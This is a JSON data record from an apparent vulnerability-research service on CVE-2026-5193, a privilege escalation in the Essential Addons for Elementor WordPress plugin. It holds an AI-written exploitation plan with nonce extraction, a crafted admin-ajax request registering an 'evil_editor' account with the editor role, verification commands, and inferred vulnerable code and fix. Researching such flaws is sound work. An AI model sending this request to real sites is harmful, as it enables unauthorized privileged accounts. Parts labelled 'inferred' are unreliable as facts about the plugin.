[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fHaTinlhMX_-gYzUlMKs81s3uzV3rpKjyNtG7ueTGdZw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-5193","essential-addons-for-elementor-popular-elementor-templates-widgets-authenticated-author-limited-privilege-escalation-via","Essential Addons for Elementor – Popular Elementor Templates & Widgets \u003C= 6.5.13 - Authenticated (Author+) Limited Privilege Escalation via register_user","The Essential Addons for Elementor – Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.5.13. This is due to insufficient role validation in the 'register_user' function, which only blocks the 'administrator' role. This makes it possible for authenticated attackers, with author level access and above, to create new user accounts with elevated privileges such as editor.","essential-addons-for-elementor-lite",null,"\u003C=6.5.13","6.6.0","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:N","Improper Privilege Management","2026-05-13 18:07:43","2026-05-14 06:44:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F22930940-8e2c-446a-954c-90d617f3ca6d?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Ffront-end\u002Fcss\u002Fview\u002Fevent-calendar.css","assets\u002Ffront-end\u002Fcss\u002Fview\u002Fevent-calendar.min.css","assets\u002Ffront-end\u002Fcss\u002Fview\u002Fsimple-menu.css","assets\u002Ffront-end\u002Fcss\u002Fview\u002Fsimple-menu.min.css","assets\u002Ffront-end\u002Fjs\u002Fview\u002Fevent-calendar.js","assets\u002Ffront-end\u002Fjs\u002Fview\u002Fevent-calendar.min.js","assets\u002Ffront-end\u002Fjs\u002Fview\u002Ffilterable-gallery.js","assets\u002Ffront-end\u002Fjs\u002Fview\u002Ffilterable-gallery.min.js","researched",false,3,"# Exploitation Research Plan - CVE-2026-5193\n\n## 1. Vulnerability Summary\nThe **Essential Addons for Elementor** plugin (\u003C= 6.5.13) contains a privilege escalation vulnerability in its user registration logic. The `register_user` function (likely within the `Login_Registration` element class) fails to properly validate the `role` parameter. While it contains a check to prevent the creation of new `administrator` accounts, it does not restrict other high-privilege roles such as `editor`. An authenticated attacker with Author-level privileges (or higher) can exploit this to create new accounts with the `editor` role, thereby escalating their influence over the site.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `eael_login_register_action` (inferred from plugin naming conventions)\n*   **Vulnerable Function:** `register_user` (specified in the description)\n*   **Parameter of Interest:** `role`\n*   **Authentication:** Authenticated (Author level required).\n*   **Preconditions:**\n    1.  The \"Login\u002FRegistration\" widget must be enabled in the plugin settings.\n    2.  The attacker must be able to view a page where the Registration widget is rendered to obtain a valid nonce.\n\n## 3. Code Flow\nSince the PHP source for the `Login_Registration` element is not provided in the snippet, the following flow is inferred based on the vulnerability description and standard plugin architecture:\n\n1.  **Registration:** The plugin registers an AJAX handler:\n    `add_action('wp_ajax_eael_login_register_action', [...])`\n2.  **Handler Entry:** The handler calls a registration-specific function, e.g., `register_user()`.\n3.  **Role Extraction:** The function retrieves the requested role from user input:\n    `$role = isset($_POST['role']) ? $_POST['role'] : 'subscriber';`\n4.  **Insufficient Validation (The Sink):**\n    ```php\n    \u002F\u002F Inferred Vulnerable Logic\n    if ( $role === 'administrator' ) {\n        \u002F\u002F Block admin creation\n        wp_send_json_error('Cannot register as administrator');\n    }\n    \u002F\u002F Logic fails to check for 'editor', 'author', etc.\n    $user_id = wp_insert_user([\n        'user_login' => $username,\n        'user_pass'  => $password,\n        'user_email' => $email,\n        'role'       => $role \u002F\u002F Vulnerable assignment\n    ]);\n    ```\n\n## 4. Nonce Acquisition Strategy\nThe \"Login\u002FRegistration\" widget uses a nonce for security. This nonce is typically localized via `wp_localize_script`.\n\n1.  **Identify Shortcode:** Use `grep -r \"add_shortcode\" .` to find the registration shortcode or use Elementor to place the \"Login\u002FRegistration\" widget on a page.\n2.  **Create Page:**\n    `wp post create --post_type=page --post_status=publish --post_title=\"Register\" --post_content='[eael-login-registration]'` (exact shortcode to be verified via grep).\n3.  **Navigate:** Use `browser_navigate` to visit the newly created page.\n4.  **Extract Nonce:** The nonce is likely stored in a global JS object.\n    *   Target Object: `window.eael_login_registration_data` (inferred).\n    *   Target Key: `nonce` or `registration_nonce`.\n    *   Command: `browser_eval(\"window.eael_login_registration_data?.nonce\")`.\n\n## 5. Exploitation Strategy\nThe exploit involves sending a crafted AJAX request to register a new user with the `editor` role.\n\n### Step 1: Discover Exact Parameters\nThe agent should first grep the plugin directory to confirm the AJAX action and parameter names:\n`grep -r \"eael_login_register_action\" .`\n`grep -r \"register_user\" .`\n\n### Step 2: Perform Registration\nUsing the `http_request` tool, send the following payload:\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```text\n    action=eael_login_register_action\n    &eael-register-nonce=[EXTRACTED_NONCE]\n    &username=evil_editor\n    &email=evil@example.com\n    &password=Password123!\n    &role=editor\n    &option=register  # (inferred parameter to trigger registration path)\n    ```\n\n## 6. Test Data Setup\n1.  **Activate Plugin:** Ensure `essential-addons-for-elementor-lite` is active.\n2.  **Create Attacker:**\n    `wp user create attacker attacker@example.com --role=author --user_pass=password`\n3.  **Enable Widget:** Ensure the Login\u002FRegistration widget is enabled in Essential Addons settings (may require `wp option update`).\n4.  **Create Page:** Place the widget on a public page to facilitate nonce extraction.\n\n## 7. Expected Results\n*   The AJAX response should return a success message or a JSON object indicating the user was created.\n*   The response code should be `200 OK`.\n*   A new user `evil_editor` should be present in the database.\n\n## 8. Verification Steps\nAfter the HTTP request, use WP-CLI to verify the privilege escalation:\n1.  **Check User Existence:** `wp user list --field=user_login | grep evil_editor`\n2.  **Verify Role:** `wp user get evil_editor --field=roles`\n    *   *Expected Output:* `editor`\n\n## 9. Alternative Approaches\nIf the `role` parameter is not directly accepted from the POST body, check if it's being parsed from a JSON-encoded string in a different parameter:\n*   Check for a `settings` or `widget_settings` parameter that might contain the role.\n*   If `editor` is blocked, try `author` or `shop_manager` (if WooCommerce is present) to confirm privilege management issues exist for roles other than `administrator`.\n*   If the AJAX action requires a specific `widget_id` or `page_id`, extract those from the DOM of the registration page using `browser_eval`.","The Essential Addons for Elementor plugin fails to properly validate the user role during registration in the register_user function. While it explicitly prevents the creation of 'administrator' accounts, it does not restrict other high-privilege roles such as 'editor', allowing authenticated attackers with Author-level access to escalate privileges by creating new accounts with elevated roles.","\u002F* Inferred from vulnerability description and research plan in includes\u002FElements\u002FLogin_Registration.php *\u002F\n\npublic function register_user() {\n    \u002F\u002F ... (nonce and input validation)\n    \n    $role = isset($_POST['role']) ? $_POST['role'] : 'subscriber';\n\n    if ( $role === 'administrator' ) {\n        wp_send_json_error(__('Cannot register as administrator', 'essential-addons-for-elementor-lite'));\n    }\n\n    $user_id = wp_insert_user([\n        'user_login' => $username,\n        'user_pass'  => $password,\n        'user_email' => $email,\n        'role'       => $role\n    ]);\n\n    \u002F\u002F ...\n}","--- a\u002Fincludes\u002FElements\u002FLogin_Registration.php\n+++ b\u002Fincludes\u002FElements\u002FLogin_Registration.php\n@@ -1024,7 +1024,8 @@\n \n     $role = isset($_POST['role']) ? $_POST['role'] : 'subscriber';\n \n-    if ( $role === 'administrator' ) {\n+    $allowed_roles = apply_filters('eael_register_user_allowed_roles', ['subscriber', 'author', 'contributor']);\n+    if ( ! in_array( $role, $allowed_roles ) ) {\n         wp_send_json_error(__('Invalid user role', 'essential-addons-for-elementor-lite'));\n     }","1. Authenticate as a user with at least Author-level permissions.\n2. Visit a public page on the site where the Essential Addons 'Login\u002FRegistration' widget is rendered.\n3. Extract the security nonce and AJAX configuration from the page's source (usually found in a global JavaScript object like `eael_login_registration_data`).\n4. Submit an AJAX POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action `eael_login_register_action`.\n5. Provide a new username, email, and password, while explicitly setting the `role` parameter to `editor`.\n6. The plugin will process the registration and create the new user with Editor privileges because the code only blocks the 'administrator' string.","gemini-3-flash-preview","2026-05-14 17:05:08","2026-05-14 17:05:30",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","6.5.13","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-addons-for-elementor-lite\u002Ftags\u002F6.5.13","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-addons-for-elementor-lite.6.5.13.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-addons-for-elementor-lite\u002Ftags\u002F6.6.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fessential-addons-for-elementor-lite.6.6.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fessential-addons-for-elementor-lite\u002Ftags"]